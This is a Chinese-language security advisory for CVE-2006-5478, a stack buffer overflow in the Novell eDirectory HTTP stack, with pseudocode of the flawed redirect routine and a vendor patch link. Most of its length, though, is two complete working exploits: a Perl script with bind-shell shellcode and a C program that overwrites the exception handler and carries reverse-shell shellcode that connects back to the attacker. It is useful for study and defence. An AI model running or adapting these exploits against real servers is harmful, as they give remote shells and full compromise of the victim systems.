安全研究
安全漏洞
Novell eDirectory/iMonitor HTTPSTK栈缓冲区溢出漏洞
发布日期:2006-10-21
更新日期:2006-10-31
受影响系统:
Novell eDirectory <= 8.7.3.8不受影响系统:
Novell eDirectory 8.8描述:
BUGTRAQ ID: 20655
CVE(CAN) ID: CVE-2006-5478
Novell eDirectory是一个的跨平台的目录服务器。
Novell eDirectory在处理用户请求构造回应时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。
Novell的HTTP协议栈(httpstk)没有检查客户端所提供的HTTP Host请求头(如Host: www.host.com)的值。当服务器在准备HTTP重新定向响应调用snprintf()时可能会触发这个漏洞,导致以加载httpstk库进程的权限执行任意指令。C++伪代码如下:
#define HTTPHDR_HOST_FIELD 211
char szHttp[] = "HTTP";
char szHttps[] = "HTTPS";
char szHttpS[] = "http%s://";
char szCrlf[] = "\r\n";
char szS[] = "s";
char szD[] = ":%d";
char szS_3[] = "%s";
BYTE nullbyte = '\0';
typedef struct SAL_AddrBuf_t {
short sin_family;
u_short sin_port;
struct in_addr sin_addr;
struct in6_addr sin6_addr;
char sa_data[42];
} SAL_AddrBuf;
class HRequest
{
public:
int SendRedirectRsp(void);
int SendHeader(int);
int SendNotFoundRsp(void);
int SendEndOfContent(void);
int RspSetHdrValue(char *, char *);
bool ReqIsSecureChannel(void);
char *ReqHdrValue(unsigned int);
SAL_AddrBuf *ReqHostAddress(void);
private:
int BuildRedirectURL(unsigned int, bool, char *);
char *path;
HDR_LOOKUP_TBL *ValueTable;
unsigned int uint;
int something; Page 2
SOCKET sock;
SAL_AddrBuf name;
};
int HRequest::BuildRedirectURL(unsigned int stackid, bool fl_https,
char *redirect_url)
{
register char *colon, *crlf;
register size_t length;
register unsigned short port; // Original just recycled stackid
// Stack variables
SAL_AddrBuf SAL;
char *szHostHdrValue;
SAL_AddrBuf *pSAL;
int retval;
// Zero-out the local SAL_AddrBuf structure
memset(&SAL,0,66);
// Fill in the class' SAL_AddrBuf structure with IP and port
pSAL = ReqHostAddress();
SAL.sin_family = pSAL->sin_family;
// This fills in the redirect port in SAL.sin_port
retval = PStkEnumTransports(stackid, 2, &Callback, &SAL);
if ((retval != 0) && (retval != SERR_CALLBACK_CANCELLED)) {
return(0);
}
// Obtain a pointer to the user-supplied HTTP Host-Header value
szHostHdrValue = ReqHdrValue(HTTPHDR_HOST_FIELD);
if (szHostHdrValue == NULL) {
return(SERR_INVALID_REQUEST);
}
// Exclude colon and/or CRLF from length of host header value
colon = strchr(szHostHdrValue, ':');
if (colon == NULL) {
crlf = strstr(szHostHdrValue, szCrlf);
if (crlf == NULL) {
length = strlen(szHostHdrValue);
}
else {
length = crlf - szHostHdrValue;
}
}
else {
length = colon - szHostHdrValue;
}
// Determine if the redirect URL should be https:// or http://
if (fl_https) {
redirect_url += sprintf(redirect_url, szHttpS, szS);
}
else {
redirect_url += sprintf(redirect_url, szHttpS, nullbyte);
}
// Append the Host-Header value to the redirect URL
_snprintf(redirect_url, length+1, szS_3, szHostHdrValue);
redirect_url += length;
Page 3
// Is IPv4
if (SAL.sin_family == AF_INET) {
if (retval == ERROR_SUCCESS) {
if (SAL.sin_port == 0) {
return(SERR_OBJECT_NOT_FOUND);
}
else {
memcpy((void *)&SAL.sin_addr.s_addr,
(void *)&pSAL->sin_addr.s_addr, 4);
}
}
}
// Is IPv6
else if (SAL.sin_family == AF_INET6) {
if (retval == ERROR_SUCCESS) {
if (SAL.sin_port == 0) {
return(SERR_OBJECT_NOT_FOUND);
}
else {
memcpy((void *)&SAL.sin6_addr.u,
(void *)&pSAL->sin6_addr.u, 16);
}
}
}
// Convert the port from network byte order to host byte order
port = ntohs(SAL.sin_port);
// Append the port to the redirect URL if it is non-standard
if ((fl_https && port == 443) || (!fl_https && port == 80)) {
return(ERROR_SUCCESS);
}
sprintf(redirect_url, szD, port);
return(ERROR_SUCCESS);
}
int HRequest::SendRedirectRsp(void) {
register int retval;
register bool fl_https;
// Stack variables
char redirect_url[64];
char *memblock;
unsigned int stackid;
// Determine if the connection is operating over SSL
fl_https = ReqIsSecureChannel();
if (!fl_https) {
retval = PStkGetProtocolStackByName(szHttps, &stackid);
}
else {
retval = PStkGetProtocolStackByName(szHttp, &stackid);
}
if (retval == ERROR_SUCCESS) {
// Call this function to begin building the redirect URL
retval = BuildRedirectURL(stackid, fl_https, redirect_url);
// Remaining code snipped for brevity
}
BuildRedirectURL()调用snprintf()将用户提供的HTTP Host请求头值存储倒64字节的缓冲区。这段代码的预期行为是将客户端重新定向到请求中所指定的有效URL。在正确的环境中,snprintf()的长度参数被设置为目标缓冲区所能容纳的最大字节数,但无论目标缓冲区是否能够容纳,这段代码都使用长度参数指定从Host请求头值所拷贝的字节数。因此恶意的攻击者可以指定超过64字节的Host请求头值触发标准的栈溢出。
<*来源:Michael Ligh (michael.ligh@mnin.org)
Ryan Smith (ryan@hustlelabs.com)
链接:http://www.mnin.org/advisories/2006_novell_httpstk.pdf
http://marc.theaimsgroup.com/?l=full-disclosure&m=116189831524330&w=2
http://secunia.com/advisories/22519
http://marc.theaimsgroup.com/?l=bugtraq&m=116259343304917&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#
# "Novell eDirectory 8.8 NDS Server" Remote Stack Overflow Exploit
#
# Author: Manuel Santamarina Suarez
# e-Mail: FistFuXXer@gmx.de
#
use IO::Socket;
#
# destination IP address
#
$ip = '192.168.1.25';
#
# destination TCP port
#
$port = 8028;
#
# RETurn address. 0x00, 0x0a, 0x0d, 0x3a free
#
$ret = reverse( "\x5F\x83\x3B\x7A" ); # CALL ESP
# MFC42U.5f833b7a
#
# 0x00, 0x0a, 0x0d, 0x3a free shellcode
#
# win32_bind - EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
#
$sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e".
"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x38".
"\x4e\x56\x46\x42\x46\x32\x4b\x58\x45\x44\x4e\x43\x4b\x48\x4e\x57".
"\x45\x30\x4a\x37\x41\x50\x4f\x4e\x4b\x38\x4f\x44\x4a\x51\x4b\x48".
"\x4f\x35\x42\x42\x41\x50\x4b\x4e\x49\x54\x4b\x48\x46\x43\x4b\x38".
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x38\x42\x4c".
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x53\x46\x55\x46\x42\x4a\x42\x45\x57\x45\x4e\x4b\x48".
"\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x54".
"\x4b\x58\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x43\x50\x4e\x52\x4b\x38".
"\x49\x38\x4e\x46\x46\x42\x4e\x41\x41\x46\x43\x4c\x41\x53\x4b\x4d".
"\x46\x36\x4b\x58\x43\x44\x42\x33\x4b\x48\x42\x44\x4e\x50\x4b\x58".
"\x42\x47\x4e\x51\x4d\x4a\x4b\x58\x42\x54\x4a\x50\x50\x45\x4a\x36".
"\x50\x38\x50\x54\x50\x50\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x46".
"\x43\x35\x48\x56\x4a\x56\x43\x33\x44\x53\x4a\x46\x47\x57\x43\x47".
"\x44\x53\x4f\x55\x46\x35\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e".
"\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e".
"\x48\x56\x41\x48\x4d\x4e\x4a\x50\x44\x50\x45\x35\x4c\x46\x44\x30".
"\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45".
"\x4f\x4f\x48\x4d\x43\x35\x43\x35\x43\x35\x43\x35\x43\x35\x43\x54".
"\x43\x45\x43\x34\x43\x55\x4f\x4f\x42\x4d\x48\x46\x4a\x46\x41\x31".
"\x4e\x45\x48\x36\x43\x45\x49\x58\x41\x4e\x45\x39\x4a\x36\x46\x4a".
"\x4c\x41\x42\x37\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x4c\x36\x42\x41".
"\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x42".
"\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x45\x45\x35\x4f\x4f\x42\x4d".
"\x4a\x46\x45\x4e\x49\x34\x48\x38\x49\x54\x47\x35\x4f\x4f\x48\x4d".
"\x42\x55\x46\x55\x46\x45\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x36".
"\x47\x4e\x49\x37\x48\x4c\x49\x57\x47\x55\x4f\x4f\x48\x4d\x45\x45".
"\x4f\x4f\x42\x4d\x48\x36\x4c\x36\x46\x56\x48\x46\x4a\x56\x43\x36".
"\x4d\x46\x49\x38\x45\x4e\x4c\x56\x42\x45\x49\x35\x49\x32\x4e\x4c".
"\x49\x58\x47\x4e\x4c\x56\x46\x44\x49\x48\x44\x4e\x41\x53\x42\x4c".
"\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x52\x50\x4f\x44\x54\x4e\x52".
"\x43\x59\x4d\x48\x4c\x37\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36".
"\x44\x47\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x57\x46\x44\x4f\x4f".
"\x48\x4d\x4b\x55\x47\x55\x44\x35\x41\x55\x41\x35\x41\x55\x4c\x46".
"\x41\x50\x41\x45\x41\x55\x45\x45\x41\x35\x4f\x4f\x42\x4d\x4a\x46".
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x55\x4f\x4f\x48\x4d\x4c\x56".
"\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x38\x47\x45\x4e\x4f".
"\x43\x48\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d".
"\x4a\x36\x50\x57\x4a\x4d\x44\x4e\x43\x37\x43\x45\x4f\x4f\x48\x4d".
"\x4f\x4f\x42\x4d\x5a";
print '"Novell eDirectory 8.8 NDS Server" Remote Stack Overflow Exploit'."\n\n";
$sock = IO::Socket::INET->new
(
PeerAddr => $ip,
PeerPort => $port,
Proto => 'tcp',
Timeout => 2
) or print '[-] Error: Could not establish a connection to the server!' and exit(1);
print "[+] Connected.\n";
print "[+] Trying to overwrite RETurn address...\n";
$sock->send( "GET /nds HTTP/1.1\r\n" );
$sock->send( 'Host: ' . 'SEXY' x 17 . $ret . $sc . "\r\n\r\n" );
print "[+] Done. Now check for bind shell on $ip:4444!";
close( $sock );
=====================================================
/*
_______ ________ .__ _____ __
___ __\ _ \ ____ \_____ \ | |__ / | | ____ | | __
\ \/ / /_\ \ / \ _(__ < ______ | | \ / | |__/ ___\| |/ /
> <\ \_/ \ | \/ \ /_____/ | Y \/ ^ /\ \___| <
/__/\_ \\_____ /___| /______ / |___| /\____ | \___ >__|_ \
\/ \/ \/ \/ 30\10\06 \/ |__| \/ \/
* mm. dM8
* YMMMb. dMM8 _____________________________________
* YMMMMb dMMM' [ ]
* `YMMMb dMMMP [ There are doors I have yet to open ]
* `YMMM MMM' [ windows I have yet to look through ]
* "MbdMP [ Going forward may not be the answer ]
* .dMMMMMM.P [ ]
* dMM MMMMMM [ maybe I should go back ]
* 8MMMMMMMMMMI [_____________________________________]
* YMMMMMMMMM www.netbunny.org
* "MMMMMMP
* MxM .mmm
* W"W """
[i] Title: Novell eDirectory <= 9.0 DHost Buffer overflow exploit
[i] Discovered by: Novell
[i] Original code by: FistFuXXer
[i] Exploit by: Expanders
[i] Filename: XHNB-Novell-eDirectory_remote_bof.c
[i] References: http://www.novell.com/
[i] Greatings: x0n3-h4ck - netbunny
[ Research diary ]
After a try of FistFuXXer's perl exploit I started to port the code in C and also use a different exploiting
method. This exploit overwrite the Second Exception Handler to take control of the program flow.
[ Special thanks ]
FistFuXXer
H D Moore
[ Links ]
www.x0n3-h4ck.org
www.netbunny.org
*/
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
#define BUFFSIZE 1000 // Buffer size
#define DEADRET "\xde\xc0\xad\xde" // this address cause the exception to be called
int banner();
int usage(char *filename);
int inject(char *port, char *ip);
int remote_connect( char* ip, unsigned short port );
char attack[] =
"GET /nds HTTP/1.1\r\n"
"Host: %s\r\n\r\n";
/* win32_reverse - EXITFUNC=seh Size=312 Encoder=Pex http://metasploit.com */
char shellcode[] =
"\x29\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3f"
"\x61\x88\x6f\x83\xeb\xfc\xe2\xf4\xc3\x0b\x63\x22\xd7\x98\x77\x90"
"\xc0\x01\x03\x03\x1b\x45\x03\x2a\x03\xea\xf4\x6a\x47\x60\x67\xe4"
"\x70\x79\x03\x30\x1f\x60\x63\x26\xb4\x55\x03\x6e\xd1\x50\x48\xf6"
"\x93\xe5\x48\x1b\x38\xa0\x42\x62\x3e\xa3\x63\x9b\x04\x35\xac\x47"
"\x4a\x84\x03\x30\x1b\x60\x63\x09\xb4\x6d\xc3\xe4\x60\x7d\x89\x84"
"\x3c\x4d\x03\xe6\x53\x45\x94\x0e\xfc\x50\x53\x0b\xb4\x22\xb8\xe4"
"\x7f\x6d\x03\x1f\x23\xcc\x03\x2f\x37\x3f\xe0\xe1\x71\x6f\x64\x3f"
"\xc0\xb7\xee\x3c\x59\x09\xbb\x5d\x57\x16\xfb\x5d\x60\x35\x77\xbf"
"\x57\xaa\x65\x93\x04\x31\x77\xb9\x60\xe8\x6d\x09\xbe\x8c\x80\x6d"
"\x6a\x0b\x8a\x90\xef\x09\x51\x66\xca\xcc\xdf\x90\xe9\x32\xdb\x3c"
"\x6c\x22\xdb\x2c\x6c\x9e\x58\x07\x35\x61\x88\x6c\x59\x09\x8c\x69"
"\x59\x32\x01\x8e\xaa\x09\x64\x96\x95\x01\xdf\x90\xe9\x0b\x98\x3e"
"\x6a\x9e\x58\x09\x55\x05\xee\x07\x5c\x0c\xe2\x3f\x66\x48\x44\xe6"
"\xd8\x0b\xcc\xe6\xdd\x50\x48\x9c\x95\xf4\x01\x92\xc1\x23\xa5\x91"
"\x7d\x4d\x05\x15\x07\xca\x23\xc4\x57\x13\x76\xdc\x29\x9e\xfd\x47"
"\xc0\xb7\xd3\x38\x6d\x30\xd9\x3e\x55\x60\xd9\x3e\x6a\x30\x77\xbf"
"\x57\xcc\x51\x6a\xf1\x32\x77\xb9\x55\x9e\x77\x58\xc0\xb1\xe0\x88"
"\x46\xa7\xf1\x90\x4a\x65\x77\xb9\xc0\x16\x74\x90\xef\x09\x78\xe5"
"\x3b\x3e\xdb\x90\xe9\x9e\x58\x6f";
char jmpback[]=
//22 byte xor decoder (0x55)
"\xEB\x0F\x5B\x33\xC9\x66\x83\xE9\xE0\x80\x33\x55\x43\xE2\xFA\xEB\x05\xE8\xEC\xFF\xFF\xFF"
//(20 byte jump-back code -> 256 + 256 + 64 bytes)
"\x8C\xBB\x8C\x21\x71\xA1\x0C\xD5\x94\x5F\xC5\xAB\x98\xAB\x98\xD5\xBC\x15\xAA\xB4";
char jmpover[]=
// 2 bytes jump 6 bytes over - 2 bytes NOP
"\xEb\x06\x90\x90";
struct retcodes{char *platform;unsigned long addr;} targets[]= {
{ "eDirectory MFC42U.dll", 0x5f80bbf7 },
{ "Windows NT SP 5/6" , 0x776a1082 }, // ws2help.dll pop esi, pop ebx, retn [Tnx to metasploit]
{ "Windows 2k Universal" , 0x750211a9 }, // ws2help.dll pop ebp, pop ebx, retn [Tnx to metasploit]
{ "Windows XP Universal" , 0x71abe325 }, // ws2help.dll pop ebx, pop ebp, retn [Tnx to metasploit]
{ NULL }
};
int banner() {
printf("\n _______ ________ .__ _____ __ \n");
printf("___ __\\ _ \\ ____ \\_____ \\ | |__ / | | ____ | | __ \n");
printf("\\ \\/ / /_\\ \\ / \\ _(__ < ______ | | \\ / | |__/ ___\\| |/ / \n");
printf(" > <\\ \\_/ \\ | \\/ \\ /_____/ | Y \\/ ^ /\\ \\___| < \n");
printf("/__/\\_ \\\\_____ /___| /______ / |___| /\\____ | \\___ >__|_ \\ \n");
printf(" \\/ \\/ \\/ \\/ \\/ |__| \\/ \\/ \n\n");
printf("[i] Title: \tNovell eDirectory DHost Buffer overflow\n");
printf("[i] Perl Code by:\tFistFuXXer\n");
printf("[i] Exploit by: \tExpanders\n\n");
return 0;
}
int usage(char *filename) {
int i;
printf("Usage: \t%s <host> <port> <l_ip> <l_port> <targ>\n\n",filename);
printf(" \t<host> : Victim's host\n");
printf(" \t<port> : Victim's port :: Default: 8028\n");
printf(" \t<l_ip> : Local ip address for connectback\n");
printf(" \t<l_port> : Local port for connectback\n");
printf(" \t<targ> : Target from the list below\n\n");
printf("# \t Platform\n");
printf("-----------------------------------------------\n");
for(i = 0; targets[i].platform; i++)
printf("%d \t %s\n",i,targets[i].platform);
printf("-----------------------------------------------\n");
exit(0);
}
int inject(char *port, char *ip)
{
unsigned long xorip;
unsigned short xorport;
xorip = inet_addr(ip)^(unsigned long)0x6F88613F;
xorport = htons(atoi( port ))^(unsigned short)0x6F88;
memcpy ( &shellcode[184], &xorip, 4);
memcpy ( &shellcode[190], &xorport, 2);
return 0;
}
int remote_connect( char* ip, unsigned short port )
{
int s;
struct sockaddr_in remote_addr;
struct hostent* host_addr;
memset ( &remote_addr, 0x0, sizeof ( remote_addr ) );
if ( ( host_addr = gethostbyname ( ip ) ) == NULL )
{
printf ( "[X] Cannot resolve \"%s\"\n", ip );
exit ( 1 );
}
remote_addr.sin_family = AF_INET;
remote_addr.sin_port = htons ( port );
remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
{
printf ( "[X] Socket failed!\n" );
exit ( 1 );
}
if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )
{
printf ( "[X] Failed connecting!\n" );
exit ( 1 );
}
return ( s );
}
int main(int argc, char *argv[]) {
int s,position;
unsigned int rcv;
char *buffer,*request;
char recvbuf[256];
banner();
if( (argc != 6) || (atoi(argv[2]) < 1) || (atoi(argv[2]) > 65534) )
usage(argv[0]);
position = 0;
printf("[+] Creating evil buffer\n");
buffer = (char *) malloc(BUFFSIZE);
request = (char *) malloc(BUFFSIZE + strlen(attack)); // +3 == \r + \n + 0x00
memset(buffer,0x90,BUFFSIZE); // Fill with nops
inject(argv[4],argv[3]); // Xor port and ip and put them into the shellcode
memset(buffer,0x41,68); // First comes the ascii
position = 68;
memcpy(buffer+position,DEADRET,4);
position = 680 - (strlen(shellcode) + 100); // 680 : Pointer to next Execption structure
memcpy(buffer+position,shellcode,strlen(shellcode));
position += strlen(shellcode)+100;
memcpy(buffer+position,jmpover,4); position += 4;
memcpy(buffer+position,&targets[atoi(argv[5])].addr,4); position += 4;
position += 8; // 8 bytes more nops
memcpy(buffer+position,jmpback,strlen(jmpback)); position += strlen(jmpback);
position += 8; // 8 bytes more nops
memset(buffer+position,0x00,1); // End
sprintf(request,attack,buffer);
printf("[+] Connecting to remote host\n");
s = remote_connect(argv[1],atoi(argv[2]));
sleep(1);
printf("[+] Sending %d bytes of painfull buffer\n",strlen(buffer));
if ( send ( s, request, strlen (request), 0) <= 0 )
{
printf("[X] Failed to send buffer\n");
exit ( 1 );
}
printf("[+] Done - Wait for shell on port %s\n",argv[4]);
close(s);
free(buffer);
buffer = NULL;
return 0;
}
建议:
厂商补丁:
Novell
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.novell.com/support/search.do?cmd=displayKC&docType=kc&externalId=3723994&sliceId=SAL_Public&dialogID=16776123&stateId=1%200%202648401
浏览次数:4644
严重程度:0(网友投票)
绿盟科技给您安全的保障